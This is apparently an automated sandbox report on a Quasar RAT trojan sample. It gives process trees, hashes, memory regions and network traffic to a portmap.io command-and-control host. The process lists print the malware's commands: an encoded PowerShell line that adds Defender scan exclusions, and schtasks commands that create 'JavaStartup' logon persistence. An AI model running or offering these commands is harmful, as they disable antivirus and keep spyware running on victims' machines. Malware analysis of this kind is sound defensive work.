Malware Analysis Report

2025-04-14 05:06

Sample ID 230109-rra2ksee42
Target 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe
SHA256 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5
Tags
quasar office04 spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5

Threat Level: Known bad

The file 58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe was found to be: Known bad.

Malicious Activity Summary

quasar office04 spyware trojan

Quasar RAT

Quasar payload

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-09 14:25

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-09 14:25

Reported

2023-01-09 14:27

Platform

win10v2004-20220901-en

Max time kernel

137s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A
N/A N/A C:\Program Files (x86)\SubDir\Java.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\SubDir\Java.exe C:\Program Files (x86)\SubDir\Java.exe N/A
File opened for modification C:\Program Files (x86)\SubDir C:\Program Files (x86)\SubDir\Java.exe N/A
File created C:\Program Files (x86)\SubDir\Java.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A
File opened for modification C:\Program Files (x86)\SubDir\Java.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\SubDir\Java.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\SubDir\Java.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 848 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 848 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 848 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 848 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 2116 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Windows\SysWOW64\schtasks.exe
PID 2116 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Windows\SysWOW64\schtasks.exe
PID 2116 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Windows\SysWOW64\schtasks.exe
PID 2116 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 2116 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 2116 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 4056 wrote to memory of 2984 N/A C:\Program Files (x86)\SubDir\Java.exe C:\Windows\SysWOW64\schtasks.exe
PID 4056 wrote to memory of 2984 N/A C:\Program Files (x86)\SubDir\Java.exe C:\Windows\SysWOW64\schtasks.exe
PID 4056 wrote to memory of 2984 N/A C:\Program Files (x86)\SubDir\Java.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUwBvAHIAcgB5ACAAdABoAGUAIABmAGkAbABlACAAaQBzACAAdQBuAGQAZQByACAAbQBhAG4AYQBnAGUAbQBlAG4AdAAuACAAVABoAGUAIABmAGkAbABlACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBsAGUAYQBzAGUAZAAgAG4AZQB4AHQAIAB5AGUAYQByACEAIABmAG8AcgAgAG0AbwByAGUAIABmAGkAbABlAHMAIAAsACAAcABsAGUAYQBzAGUAIABjAGgAZQBjAGsAIABtAHkAIABkAGkAcwBjAG8AcgBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAbABmACMAPgA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f

C:\Program Files (x86)\SubDir\Java.exe

"C:\Program Files (x86)\SubDir\Java.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 192.168.0.125:4782 tcp
N/A 209.197.3.8:80 tcp
N/A 104.80.225.205:443 tcp
N/A 20.189.173.12:443 tcp
N/A 8.8.8.8:53 AeroNaut-25032.portmap.io udp
N/A 193.161.193.99:25032 AeroNaut-25032.portmap.io tcp
N/A 192.168.0.125:4782 tcp
N/A 209.197.3.8:80 tcp
N/A 209.197.3.8:80 tcp
N/A 209.197.3.8:80 tcp
N/A 193.161.193.99:25032 AeroNaut-25032.portmap.io tcp
N/A 192.168.0.125:4782 tcp
N/A 193.161.193.99:25032 AeroNaut-25032.portmap.io tcp
N/A 192.168.0.125:4782 tcp
N/A 193.161.193.99:25032 AeroNaut-25032.portmap.io tcp
N/A 192.168.0.125:4782 tcp

Files

memory/4024-132-0x0000000000000000-mapping.dmp

memory/4024-133-0x0000000002830000-0x0000000002866000-memory.dmp

memory/4024-134-0x00000000050B0000-0x00000000056D8000-memory.dmp

memory/4024-135-0x0000000004F90000-0x0000000004FB2000-memory.dmp

memory/4024-136-0x0000000005790000-0x00000000057F6000-memory.dmp

memory/4024-137-0x0000000005800000-0x0000000005866000-memory.dmp

memory/4024-138-0x0000000005E30000-0x0000000005E4E000-memory.dmp

memory/4024-139-0x0000000007490000-0x0000000007B0A000-memory.dmp

memory/4024-140-0x0000000006320000-0x000000000633A000-memory.dmp

memory/4024-141-0x00000000080C0000-0x0000000008664000-memory.dmp

memory/4024-142-0x0000000007030000-0x00000000070C2000-memory.dmp

memory/2408-143-0x0000000000000000-mapping.dmp

memory/2116-144-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

memory/2116-147-0x00000000009B0000-0x0000000000A0E000-memory.dmp

memory/2116-148-0x00000000058F0000-0x0000000005902000-memory.dmp

memory/2408-149-0x0000000006E00000-0x0000000006E32000-memory.dmp

memory/2408-150-0x0000000070200000-0x000000007024C000-memory.dmp

memory/2116-152-0x00000000064D0000-0x000000000650C000-memory.dmp

memory/2408-151-0x0000000006DE0000-0x0000000006DFE000-memory.dmp

memory/4308-153-0x0000000000000000-mapping.dmp

memory/4056-154-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\SubDir\Java.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Program Files (x86)\SubDir\Java.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

memory/2408-157-0x0000000007B90000-0x0000000007B9A000-memory.dmp

memory/2408-158-0x0000000007DB0000-0x0000000007E46000-memory.dmp

memory/2408-159-0x0000000007D60000-0x0000000007D6E000-memory.dmp

memory/2408-160-0x0000000007E50000-0x0000000007E6A000-memory.dmp

memory/2408-161-0x0000000007DA0000-0x0000000007DA8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba4f16a3fe5704136d34f3c9fa04d896
SHA1 5d2d6a763b61c5338583194d869171a7af14bafc
SHA256 7f684196a3f6e786bed918870e0c3c84575991224b138b93a327de9ed249a03c
SHA512 eccf2335489ea553201eec9c74149fba004adf1e450912a5e73a75bd713d8fb9b3bde2f84a15d0b2e296cfb2feacc10bb3e9c37d3b87bf95c5371aff29ddb0d0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4cc9e7069534f7bcbb90ad7cac69ed78
SHA1 a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892
SHA256 4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c
SHA512 e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

memory/2984-164-0x0000000000000000-mapping.dmp

memory/4056-165-0x0000000006920000-0x000000000692A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-09 14:25

Reported

2023-01-09 14:27

Platform

win7-20220812-en

Max time kernel

126s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A
N/A N/A C:\Program Files (x86)\SubDir\Java.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\SubDir\Java.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A
File opened for modification C:\Program Files (x86)\SubDir\Java.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A
File opened for modification C:\Program Files (x86)\SubDir\Java.exe C:\Program Files (x86)\SubDir\Java.exe N/A
File opened for modification C:\Program Files (x86)\SubDir C:\Program Files (x86)\SubDir\Java.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\SubDir\Java.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\SubDir\Java.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1088 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1088 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 1088 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 1088 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 1088 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe C:\Users\Admin\AppData\Local\Temp\Client-built.exe
PID 820 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Windows\SysWOW64\schtasks.exe
PID 820 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Windows\SysWOW64\schtasks.exe
PID 820 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Windows\SysWOW64\schtasks.exe
PID 820 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Windows\SysWOW64\schtasks.exe
PID 820 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 820 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 820 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 820 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 820 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 820 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 820 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Client-built.exe C:\Program Files (x86)\SubDir\Java.exe
PID 1996 wrote to memory of 2012 N/A C:\Program Files (x86)\SubDir\Java.exe C:\Windows\SysWOW64\schtasks.exe
PID 1996 wrote to memory of 2012 N/A C:\Program Files (x86)\SubDir\Java.exe C:\Windows\SysWOW64\schtasks.exe
PID 1996 wrote to memory of 2012 N/A C:\Program Files (x86)\SubDir\Java.exe C:\Windows\SysWOW64\schtasks.exe
PID 1996 wrote to memory of 2012 N/A C:\Program Files (x86)\SubDir\Java.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe

"C:\Users\Admin\AppData\Local\Temp\58dc62330246d51406746ba6eb9938293cfdddf356e538307f86487da238f4f5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAegBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUwBvAHIAcgB5ACAAdABoAGUAIABmAGkAbABlACAAaQBzACAAdQBuAGQAZQByACAAbQBhAG4AYQBnAGUAbQBlAG4AdAAuACAAVABoAGUAIABmAGkAbABlACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBsAGUAYQBzAGUAZAAgAG4AZQB4AHQAIAB5AGUAYQByACEAIABmAG8AcgAgAG0AbwByAGUAIABmAGkAbABlAHMAIAAsACAAcABsAGUAYQBzAGUAIABjAGgAZQBjAGsAIABtAHkAIABkAGkAcwBjAG8AcgBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAbABmACMAPgA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAaQBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAaQB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABrACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client-built.exe" /rl HIGHEST /f

C:\Program Files (x86)\SubDir\Java.exe

"C:\Program Files (x86)\SubDir\Java.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "JavaStartup" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\Java.exe" /rl HIGHEST /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 208.95.112.1:80 ip-api.com tcp
N/A 192.168.0.125:4782 tcp
N/A 8.8.8.8:53 AeroNaut-25032.portmap.io udp
N/A 193.161.193.99:25032 AeroNaut-25032.portmap.io tcp
N/A 192.168.0.125:4782 tcp
N/A 193.161.193.99:25032 AeroNaut-25032.portmap.io tcp
N/A 192.168.0.125:4782 tcp
N/A 193.161.193.99:25032 AeroNaut-25032.portmap.io tcp
N/A 192.168.0.125:4782 tcp

Files

memory/1088-54-0x0000000074C91000-0x0000000074C93000-memory.dmp

memory/304-55-0x0000000000000000-mapping.dmp

memory/304-57-0x00000000737A0000-0x0000000073D4B000-memory.dmp

memory/932-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 09491f53829b6a3bab13fb0e98fab068
SHA1 815480a0cf434ac34ddd7bc031066ed14687395c
SHA256 257644182d9199a83598c76c73f9418ad4697c585e3192fedaaee8332710cc23
SHA512 dd487a30ad1fe189b9fc4cbc4db2df23c0ecc0b259f5c3209c1ba85f8646f1c615ca0a2567af1dfe5efccae8227b4eb592aca7b9b9a3668dc7ccfa3e54e81adc

memory/820-61-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Client-built.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Users\Admin\AppData\Local\Temp\Client-built.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

memory/820-65-0x0000000000170000-0x00000000001CE000-memory.dmp

memory/932-67-0x00000000737A0000-0x0000000073D4B000-memory.dmp

memory/668-68-0x0000000000000000-mapping.dmp

memory/304-69-0x00000000737A0000-0x0000000073D4B000-memory.dmp

\Program Files (x86)\SubDir\Java.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

memory/1996-71-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\SubDir\Java.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

C:\Program Files (x86)\SubDir\Java.exe

MD5 c1c21a2fdc2f99f98c91ce2d1219cd96
SHA1 5bdd5bf45b0e809d4fa4e2c99ddb5c175adb0ce8
SHA256 0b443bb044df9d13646f3a96d07270f1ad791e94e30c94f341e5dcdc2fb853b2
SHA512 3b8299f2447ee1586133032157a2424b408352d5a38b36f727b706e97ea5bbbab9e60bed84b93a37459ad9e0b2edd5440c607c7f4cff4090b4a05afbe2bf77bf

